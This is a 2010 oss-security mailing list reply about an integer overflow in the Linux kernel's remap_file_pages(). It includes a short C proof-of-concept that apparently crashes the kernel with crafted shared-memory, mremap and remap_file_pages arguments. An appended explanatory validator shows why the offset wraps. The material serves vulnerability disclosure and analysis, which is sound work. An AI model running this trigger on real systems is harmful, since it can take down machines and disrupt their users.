
List:       oss-security
Subject:    Re: [oss-security] kernel: avoid pgoff overflow in remap_file_pages
From:       akiphie <akiphie () lavabit ! com>
Date:       2010-10-12 18:27:39
Message-ID: 20101012182739.3560D11B926 () karen ! lavabit ! com

On Tuesday 12 October 2010 09:19:29 Eugene Teo wrote:
> Thomas Pollet reported an integer overflow issue in remap_file_pages().
> While we are able to reproduce the issue, we are unable to find a
> security impact. If your views differ, do let us know.

This made my computer very sad :(

#include <sys/mman.h>
#include <unistd.h>
#include <sys/ipc.h>
#include <sys/shm.h>

int main(int argc, char **argv)
{
  int x = shmget(IPC_PRIVATE, 1, IPC_CREAT | IPC_EXCL | 0600);
  void *mem = shmat(x, NULL, 0);
  mremap(mem, 0x1000, 0x1000, MREMAP_MAYMOVE | MREMAP_FIXED, 0x0);
  remap_file_pages((void *) 0xfff, ~0UL, 0, -(~0UL >> 12), 0);
  return 0;
}


--
cnu
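
Added example, not part of the original message and not kernel code: a user-space model of argument validation for a remap_file_pages-style call, showing why the size/pgoff pair above passes an address-range check yet wraps the page offset. The function names, the verdict enum and the 4 KiB page size are assumptions made for this illustration.

```c
#include <stdio.h>

#define PAGE_SHIFT 12                              /* assumed 4 KiB pages */
#define PAGE_MASK  (~((1UL << PAGE_SHIFT) - 1))

enum remap_verdict { REMAP_OK = 0, REMAP_BAD_RANGE, REMAP_PGOFF_WRAP };

/* Hypothetical validator: page-align the inputs, then reject wraps. */
static enum remap_verdict check_remap_args(unsigned long start,
                                           unsigned long size,
                                           unsigned long pgoff)
{
    unsigned long pages;

    start &= PAGE_MASK;
    size  &= PAGE_MASK;

    /* Address range must not wrap and must not be empty. */
    if (start + size <= start)
        return REMAP_BAD_RANGE;

    /* Page offset plus page count must not wrap either. */
    pages = size >> PAGE_SHIFT;
    if (pgoff + pages < pgoff)
        return REMAP_PGOFF_WRAP;

    return REMAP_OK;
}

/* End page offset as computed when no wrap check is made. */
static unsigned long end_pgoff_unchecked(unsigned long size, unsigned long pgoff)
{
    return pgoff + ((size & PAGE_MASK) >> PAGE_SHIFT);
}

int main(void)
{
    /* Argument values taken from the call in the message above. */
    unsigned long start = 0xfff, size = ~0UL, pgoff = -(~0UL >> 12);

    printf("unchecked end pgoff: %#lx\n", end_pgoff_unchecked(size, pgoff));
    printf("verdict: %d\n", check_remap_args(start, size, pgoff));
    return 0;
}
```

With these arguments the aligned start is 0, so start + size does not wrap, while pgoff plus the page count lands exactly on 0; only the second comparison rejects the call.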

